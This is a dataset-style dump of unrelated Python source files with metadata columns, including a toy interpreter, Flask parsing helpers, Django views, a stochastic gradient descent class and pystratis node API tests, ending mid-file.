hello.append('Hi "{usr}",\nwhat can I do for you?')
hello.append('WAZZZZUUUUUUUUUUUUUUP "{usr}"')
return hello
def resp_trex():
return"I am a T-Rex!:t-rex:\nI have a BIG head and little arms,\nRAWWWRRRRR!!"
def resp_date():
return 'the date is: '
def resp_time():
return 'the time is: ' | none | 1 | 3.131957 | 3 |
List_5/Task_1/instructions.py | Szpila123/Advanced_python_course | 0 | 13556 | import expressions
import abc
import copy
class Instruction(abc.ABC):
@abc.abstractmethod
def __init__(): ...
@abc.abstractmethod
def wykonaj(self, zmienne) -> dict[str, int]:
'''Evaluate the instruction'''
...
@abc.abstractmethod
def __str__(self): ...
class If(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch_true: Instruction, branch_false: Instruction):
self._cond = cond
self._branch_true = branch_true
self._branch_false = branch_false
def wykonaj(self, zmienne):
if self._cond.oblicz(zmienne) == 0:
lokalne_zmienne = self._branch_true.wykonaj(copy.copy(zmienne))
else:
lokalne_zmienne = self._branch_false.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'if {str(self._cond)}\n\n\tthen\t{tab.join(str(self._branch_true).split(nl))}\n\n\telse\t{tab.join(str(self._branch_false).split(nl))}\n'
class While(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch: Instruction):
self._cond = cond
self._branch = branch
def wykonaj(self, zmienne):
while self._cond.oblicz(zmienne):
lokalne_zmienne = self._branch.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'while {str(self._cond)}\n\n\tdo\t{tab.join(str(self._branch).split(nl))}\n'
class Chain(Instruction):
def __init__(self, instructions: list[Instruction]):
self._chain = instructions
def wykonaj(self, zmienne):
for inst in self._chain:
zmienne = inst.wykonaj(zmienne)
return zmienne
def __str__(self):
return '\n'.join([str(inst) for inst in self._chain])
class Assign(Instruction):
def __init__(self, var: expressions.Zmienna, val: expressions.Wyrazenie):
self._var = var
self._val = val
def wykonaj(self, zmienne):
zmienne[str(self._var)] = self._val.oblicz(zmienne)
return zmienne
def __str__(self):
return f'{self._var} = {self._val}'
| import expressions
import abc
import copy
class Instruction(abc.ABC):
@abc.abstractmethod
def __init__(): ...
@abc.abstractmethod
def wykonaj(self, zmienne) -> dict[str, int]:
'''Evaluate the instruction'''
...
@abc.abstractmethod
def __str__(self): ...
class If(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch_true: Instruction, branch_false: Instruction):
self._cond = cond
self._branch_true = branch_true
self._branch_false = branch_false
def wykonaj(self, zmienne):
if self._cond.oblicz(zmienne) == 0:
lokalne_zmienne = self._branch_true.wykonaj(copy.copy(zmienne))
else:
lokalne_zmienne = self._branch_false.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'if {str(self._cond)}\n\n\tthen\t{tab.join(str(self._branch_true).split(nl))}\n\n\telse\t{tab.join(str(self._branch_false).split(nl))}\n'
class While(Instruction):
def __init__(self, cond: expressions.Wyrazenie, branch: Instruction):
self._cond = cond
self._branch = branch
def wykonaj(self, zmienne):
while self._cond.oblicz(zmienne):
lokalne_zmienne = self._branch.wykonaj(copy.copy(zmienne))
for key in lokalne_zmienne:
if key in zmienne:
zmienne[key] = lokalne_zmienne[key]
return zmienne
def __str__(self):
tab, nl = '\n\t\t', '\n'
return f'while {str(self._cond)}\n\n\tdo\t{tab.join(str(self._branch).split(nl))}\n'
class Chain(Instruction):
def __init__(self, instructions: list[Instruction]):
self._chain = instructions
def wykonaj(self, zmienne):
for inst in self._chain:
zmienne = inst.wykonaj(zmienne)
return zmienne
def __str__(self):
return '\n'.join([str(inst) for inst in self._chain])
class Assign(Instruction):
def __init__(self, var: expressions.Zmienna, val: expressions.Wyrazenie):
self._var = var
self._val = val
def wykonaj(self, zmienne):
zmienne[str(self._var)] = self._val.oblicz(zmienne)
return zmienne
def __str__(self):
return f'{self._var} = {self._val}'
| pt | 0.121851 | 3.394838 | 3 |
components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 2 | 13557 | """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
"""
Given an list of ordered pairs, contstruct a dict as with the normal JSON
``object_pairs_hook``, but raise an exception if there are duplicate keys
with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = [p for p in counter.iteritems() if p[1] > 1]
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates))
)
return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
"""
Return a python representation of a JSON document.
Args:
raw (str): string of raw JSON content
Raises:
UserError: if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates
)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""
Return a python representation of a JSON POST body.
Args:
raw (str): string of raw JSON content
Return:
TODO
Raises:
UserError: if any exception is raised parsing the JSON body
UserError: if the result is not of the expected type
If raw is not provided, pull the body from global request object.
"""
parsed = parse_json(flask.request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
def parse_request_yaml():
"""
Return a python representation of a YAML POST body. Raise UserError if any
exception is raised parsing the YAML body.
"""
try:
return yaml.safe_load(flask.request.get_data())
except Exception as e:
raise UserError('Unable to parse yaml: {}'.format(e))
| """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
"""
Given an list of ordered pairs, contstruct a dict as with the normal JSON
``object_pairs_hook``, but raise an exception if there are duplicate keys
with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = [p for p in counter.iteritems() if p[1] > 1]
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates))
)
return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
"""
Return a python representation of a JSON document.
Args:
raw (str): string of raw JSON content
Raises:
UserError: if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates
)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""
Return a python representation of a JSON POST body.
Args:
raw (str): string of raw JSON content
Return:
TODO
Raises:
UserError: if any exception is raised parsing the JSON body
UserError: if the result is not of the expected type
If raw is not provided, pull the body from global request object.
"""
parsed = parse_json(flask.request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
def parse_request_yaml():
"""
Return a python representation of a YAML POST body. Raise UserError if any
exception is raised parsing the YAML body.
"""
try:
return yaml.safe_load(flask.request.get_data())
except Exception as e:
raise UserError('Unable to parse yaml: {}'.format(e))
| pt | 0.199533 | 2.665372 | 3 |
frames/rocket/rocket_frames.py | rkinwork/dvmn_async-console-game | 0 | 13558 | <filename>frames/rocket/rocket_frames.py
from pathlib import Path
def get_rockets_frames():
"""Init rocket animation frames."""
frames_files = ['rocket_frame_1.txt', 'rocket_frame_2.txt']
frames = [(Path(__file__).resolve().parent / frame_file_name).read_text() for frame_file_name in frames_files]
return tuple(frames)
| <filename>frames/rocket/rocket_frames.py
from pathlib import Path
def get_rockets_frames():
"""Init rocket animation frames."""
frames_files = ['rocket_frame_1.txt', 'rocket_frame_2.txt']
frames = [(Path(__file__).resolve().parent / frame_file_name).read_text() for frame_file_name in frames_files]
return tuple(frames)
| pt | 0.169212 | 2.44771 | 2 |
JuHPLC/views.py | FZJ-INM5/JuHPLC | 1 | 13559 | <filename>JuHPLC/views.py
from JuHPLC.Views.NewChromatogram import *
from JuHPLC.SerialCommunication.MicroControllerManager import MicroControllerManager
# Create your views here.
def index(request):
chromatograms = Chromatogram.objects.all().order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
def mychromatograms(request):
chromatograms = Chromatogram.objects.all().filter(User=request.user).order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
| <filename>JuHPLC/views.py
from JuHPLC.Views.NewChromatogram import *
from JuHPLC.SerialCommunication.MicroControllerManager import MicroControllerManager
# Create your views here.
def index(request):
chromatograms = Chromatogram.objects.all().order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
def mychromatograms(request):
chromatograms = Chromatogram.objects.all().filter(User=request.user).order_by("-Datetime")
for i in chromatograms:
i.data = HplcData.objects.filter(Chromatogram=i).count()>0
return render(request, "index.html", {
"chromatograms": chromatograms,
"active": MicroControllerManager.getinstance().getactivechromatogramids()
})
| it | 0.246747 | 2.294784 | 2 |
sequana/datatools.py | vladsaveliev/sequana | 0 | 13560 | # -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>,
# <<EMAIL>>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Retrieve data from sequana library"""
import os
import easydev
import glob
import collections
def sequana_data(filename=None, where=None):
"""Return full path of a sequana resource data file.
:param str filename: a valid filename to be found
:param str where: one of the registered data directory (see below)
:return: the path of file. See also here below in the case where
filename is set to "*".
.. code-block:: python
from sequana import sequana_data
filename = sequana_data("test.bam")
Type the function name with "*" parameter to get a list of
available files. Withe where argument set, the function returns a
list of files. Without the where argument, a dictionary is returned where
keys correspond to the registered directories::
filenames = sequana_data("*", where="images")
Registered directories are:
- data
- testing
- data/adapters
- images
.. note:: this does not handle wildcards. The * means retrieve all files.
"""
sequana_path = easydev.get_package_location('sequana')
sharedir = os.sep.join([sequana_path , "sequana", 'resources'])
directories = ['data', 'testing', 'data/adapters', 'images', 'scripts']
if filename == "*":
found = collections.defaultdict(list)
if where is not None:
directories = [where]
for thisdir in directories:
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
found[thisdir].append(os.path.split(filename)[1])
if where is not None:
return found[where]
return found
if filename is None:
for thisdir in directories:
print('From %s directory:' % thisdir)
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
print(' - sequana("%s", "%s")' % (os.path.split(filename)[1], thisdir))
raise ValueError("Choose a valid file from the list above")
# in the code one may use / or \
if where:
filename = os.sep.join([sharedir, where, filename])
else:
def _get_valid_file(filename, directory):
filename = os.sep.join([sharedir, directory, filename])
if os.path.exists(filename) is False:
return False
else:
return filename
# try to introspect the different directories
# return filename if found otherwise raise error
for thisdir in directories:
if _get_valid_file(filename, thisdir):
return _get_valid_file(filename, thisdir)
raise Exception("unknown file %s. Type sequana_data() to get a list of valid names" % filename)
return filename
| # -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>,
# <<EMAIL>>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Retrieve data from sequana library"""
import os
import easydev
import glob
import collections
def sequana_data(filename=None, where=None):
"""Return full path of a sequana resource data file.
:param str filename: a valid filename to be found
:param str where: one of the registered data directory (see below)
:return: the path of file. See also here below in the case where
filename is set to "*".
.. code-block:: python
from sequana import sequana_data
filename = sequana_data("test.bam")
Type the function name with "*" parameter to get a list of
available files. Withe where argument set, the function returns a
list of files. Without the where argument, a dictionary is returned where
keys correspond to the registered directories::
filenames = sequana_data("*", where="images")
Registered directories are:
- data
- testing
- data/adapters
- images
.. note:: this does not handle wildcards. The * means retrieve all files.
"""
sequana_path = easydev.get_package_location('sequana')
sharedir = os.sep.join([sequana_path , "sequana", 'resources'])
directories = ['data', 'testing', 'data/adapters', 'images', 'scripts']
if filename == "*":
found = collections.defaultdict(list)
if where is not None:
directories = [where]
for thisdir in directories:
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
found[thisdir].append(os.path.split(filename)[1])
if where is not None:
return found[where]
return found
if filename is None:
for thisdir in directories:
print('From %s directory:' % thisdir)
for filename in glob.glob(sharedir + "/%s/*" % thisdir):
filename = os.path.split(filename)[1]
to_ignore = ["__init__.py", "__pycache__"]
if filename.endswith('.pyc') or filename in to_ignore:
pass
else:
print(' - sequana("%s", "%s")' % (os.path.split(filename)[1], thisdir))
raise ValueError("Choose a valid file from the list above")
# in the code one may use / or \
if where:
filename = os.sep.join([sharedir, where, filename])
else:
def _get_valid_file(filename, directory):
filename = os.sep.join([sharedir, directory, filename])
if os.path.exists(filename) is False:
return False
else:
return filename
# try to introspect the different directories
# return filename if found otherwise raise error
for thisdir in directories:
if _get_valid_file(filename, thisdir):
return _get_valid_file(filename, thisdir)
raise Exception("unknown file %s. Type sequana_data() to get a list of valid names" % filename)
return filename
| it | 0.181371 | 2.584488 | 3 |
example/models.py | nim65s/django-jugemaj | 0 | 13561 | <filename>example/models.py
"""Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
"""A django model to represent something available on wikidata."""
name = models.CharField(max_length=50)
wikidata = models.PositiveIntegerField()
def __str__(self):
"""Get the name of this wikidata instance."""
return self.name
@property
def wikidata_url(self):
"""Get a direct link to the wikidata item."""
return f"https://www.wikidata.org/wiki/Q{self.wikidata}"
def update_name(self):
"""Update the name from wikidata."""
labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
self.save()
| <filename>example/models.py
"""Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
"""A django model to represent something available on wikidata."""
name = models.CharField(max_length=50)
wikidata = models.PositiveIntegerField()
def __str__(self):
"""Get the name of this wikidata instance."""
return self.name
@property
def wikidata_url(self):
"""Get a direct link to the wikidata item."""
return f"https://www.wikidata.org/wiki/Q{self.wikidata}"
def update_name(self):
"""Update the name from wikidata."""
labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
self.save()
| pt | 0.198589 | 3.101345 | 3 |
build_tests/python_opencv.py | AustinSchuh/971-Robot-Code | 39 | 13562 | #!/usr/bin/python3
import cv2
if __name__ == '__main__':
cv2.SIFT_create()
| #!/usr/bin/python3
import cv2
if __name__ == '__main__':
cv2.SIFT_create()
| es | 0.214061 | 1.341454 | 1 |
tests/pytorch_pfn_extras_tests/training_tests/extensions_tests/test_print_report_notebook.py | yasuyuky/pytorch-pfn-extras | 243 | 13563 | import io
import pytest
import pytorch_pfn_extras as ppe
from pytorch_pfn_extras.training.extensions import _ipython_module_available
from pytorch_pfn_extras.training.extensions.log_report import _pandas_available
@pytest.mark.skipif(
not _ipython_module_available or not _pandas_available,
reason="print report notebook import failed, "
"maybe ipython is not installed"
)
def test_run_print_report_notebook():
max_epochs = 5
iters_per_epoch = 5
manager = ppe.training.ExtensionsManager(
{}, {}, max_epochs, iters_per_epoch=iters_per_epoch)
out = io.StringIO()
log_report = ppe.training.extensions.LogReport()
manager.extend(log_report)
extension = ppe.training.extensions.PrintReportNotebook(out=out)
manager.extend(extension)
for _ in range(max_epochs):
for _ in range(iters_per_epoch):
with manager.run_iteration():
# Only test it runs without fail
# The value is not tested now...
pass
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
| import io
import pytest
import pytorch_pfn_extras as ppe
from pytorch_pfn_extras.training.extensions import _ipython_module_available
from pytorch_pfn_extras.training.extensions.log_report import _pandas_available
@pytest.mark.skipif(
not _ipython_module_available or not _pandas_available,
reason="print report notebook import failed, "
"maybe ipython is not installed"
)
def test_run_print_report_notebook():
max_epochs = 5
iters_per_epoch = 5
manager = ppe.training.ExtensionsManager(
{}, {}, max_epochs, iters_per_epoch=iters_per_epoch)
out = io.StringIO()
log_report = ppe.training.extensions.LogReport()
manager.extend(log_report)
extension = ppe.training.extensions.PrintReportNotebook(out=out)
manager.extend(extension)
for _ in range(max_epochs):
for _ in range(iters_per_epoch):
with manager.run_iteration():
# Only test it runs without fail
# The value is not tested now...
pass
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
| pt | 0.138669 | 2.198257 | 2 |
examples/python/00-list-devices.py | vishal-prgmr/tiscamera | 0 | 13564 | #!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
"""
Print information about all available devices
"""
source = Gst.ElementFactory.make("tcambin")
serials = source.get_device_serials()
for single_serial in serials:
# This returns someting like:
# (True,
# name='DFK Z12GP031',
# identifier='The Imaging Source Europe GmbH-11410533',
# connection_type='aravis')
# The identifier is the name given by the backend
# The connection_type identifies the backend that is used.
# Currently 'aravis', 'v4l2', 'libusb' and 'unknown' exist
(return_value, model,
identifier, connection_type) = source.get_device_info(single_serial)
# return value would be False when a non-existant serial is used
# since we are iterating get_device_serials this should not happen
if return_value:
print("Model: {} Serial: {} Type: {}".format(model,
single_serial,
connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
list_devices()
| #!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
"""
Print information about all available devices
"""
source = Gst.ElementFactory.make("tcambin")
serials = source.get_device_serials()
for single_serial in serials:
# This returns someting like:
# (True,
# name='DFK Z12GP031',
# identifier='The Imaging Source Europe GmbH-11410533',
# connection_type='aravis')
# The identifier is the name given by the backend
# The connection_type identifies the backend that is used.
# Currently 'aravis', 'v4l2', 'libusb' and 'unknown' exist
(return_value, model,
identifier, connection_type) = source.get_device_info(single_serial)
# return value would be False when a non-existant serial is used
# since we are iterating get_device_serials this should not happen
if return_value:
print("Model: {} Serial: {} Type: {}".format(model,
single_serial,
connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
list_devices()
| pt | 0.161491 | 2.394649 | 2 |
regression/sgd.py | sahitpj/MachineLearning | 2 | 13565 | from .linear_torch import TorchGradientDescentAutogradRegression
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
def __init__(self, X, Y, alpha, **kwargs):
super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
try:
h = kwargs['batch_size']
self.iterations = int(self.Y.shape[0])/h
self.batch_size = int(self.Y.shape[0])/self.iterations
except:
self.iterations = int(self.Y.shape[0])
self.batch_size = 1
try:
self.epochs_no = kwargs['epochs_no']
except:
self.epochs_no = 1
self.batches = None
def assign_batchs(self):
r = range(int(self.Y.shape[0]))
random.shuffle(r, random.random)
batches = list()
for i in xrange(self.iterations):
batches.append(r[i:i+self.batch_size])
self.batches = batches
return batches
def ForwardFunction(self, i):
X = self.X[self.batches[i]]
Y = self.Y[self.batches[i]]
p = torch.mean((Y-X.mm(self.theta.double()))**2) #Loss function forward function
self.objective = p
return p
def get_grads(self, i):
self.initialise_theta()
k = self.ForwardFunction(i)
self.objective.backward()
self.gradients = self.theta.grad
return self.gradients
def epoch(self):
for i in xrange(self.iterations):
self.update_theta(i)
return self.theta
def update_theta(self, i):
h = self.get_grads(i)
current_theta = self.theta.clone() #cloing theta so that we don't update in-place values
current_theta -= self.gradients*self.alpha
self.theta = current_theta
return current_theta
def train(self):
self.initialise_theta()
error = 0.0001
for i in xrange(self.epochs_no):
self.assign_batchs()
print('')
theta = self.epoch().double()
print('Epoch - '+ str(i+1))
print('')
return theta
print(self.MSE(theta))
if self.MSE(theta) <= error:
break
print('### Training complete') | from .linear_torch import TorchGradientDescentAutogradRegression
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
def __init__(self, X, Y, alpha, **kwargs):
super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
try:
h = kwargs['batch_size']
self.iterations = int(self.Y.shape[0])/h
self.batch_size = int(self.Y.shape[0])/self.iterations
except:
self.iterations = int(self.Y.shape[0])
self.batch_size = 1
try:
self.epochs_no = kwargs['epochs_no']
except:
self.epochs_no = 1
self.batches = None
def assign_batchs(self):
r = range(int(self.Y.shape[0]))
random.shuffle(r, random.random)
batches = list()
for i in xrange(self.iterations):
batches.append(r[i:i+self.batch_size])
self.batches = batches
return batches
def ForwardFunction(self, i):
X = self.X[self.batches[i]]
Y = self.Y[self.batches[i]]
p = torch.mean((Y-X.mm(self.theta.double()))**2) #Loss function forward function
self.objective = p
return p
def get_grads(self, i):
self.initialise_theta()
k = self.ForwardFunction(i)
self.objective.backward()
self.gradients = self.theta.grad
return self.gradients
def epoch(self):
for i in xrange(self.iterations):
self.update_theta(i)
return self.theta
def update_theta(self, i):
h = self.get_grads(i)
current_theta = self.theta.clone() #cloing theta so that we don't update in-place values
current_theta -= self.gradients*self.alpha
self.theta = current_theta
return current_theta
def train(self):
self.initialise_theta()
error = 0.0001
for i in xrange(self.epochs_no):
self.assign_batchs()
print('')
theta = self.epoch().double()
print('Epoch - '+ str(i+1))
print('')
return theta
print(self.MSE(theta))
if self.MSE(theta) <= error:
break
print('### Training complete') | pt | 0.154053 | 2.584562 | 3 |
pystratis/api/node/tests/test_node.py | TjadenFroyda/pyStratis | 8 | 13566 | import pytest
import ast
from pytest_mock import MockerFixture
from pystratis.api.node import Node
from pystratis.api.node.responsemodels import *
from pystratis.api import FullNodeState, FeatureInitializationState, LogRule
from pystratis.core.networks import StraxMain, CirrusMain
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_no_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=False)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=True)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_blockheader(mocker: MockerFixture, network, generate_uint256):
data = {
'version': 1,
'merkleroot': generate_uint256,
'nonce': 0,
'bits': 'bits',
'previousblockhash': generate_uint256,
'time': 1,
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_blockheader(
block_hash=generate_uint256,
is_json_format=True
)
assert response == BlockHeaderModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_verbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=True)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_nonverbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'get', return_value=hexified_data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=False)
assert response == hexified_data
unserialized_response = ast.literal_eval(bytes.fromhex(hexified_data).decode('ascii'))
assert data == unserialized_response
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_decode_raw_transaction(mocker: MockerFixture, network, generate_uint256, generate_coinbase_transaction):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.decode_raw_transaction(raw_hex=hexified_data)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_validate_address(mocker: MockerFixture, network, generate_p2pkh_address):
address = generate_p2pkh_address(network=network)
data = {
'isvalid': True,
'address': address,
'scriptPubKey': 'a scriptPubKey',
'isscript': False,
'iswitness': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.validate_address(address=address)
assert response == ValidateAddressModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout(mocker: MockerFixture, network, generate_uint256, generate_hexstring, generate_p2pkh_address):
data = {
'bestblock': generate_uint256,
'confirmations': 1,
'value': 5,
'scriptPubKey': {
'asm': generate_hexstring(128),
'hex': generate_hexstring(128),
'type': 'pubkey',
'reqSigs': 1,
"addresses": [
generate_p2pkh_address(network=network)
]
},
'coinbase': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
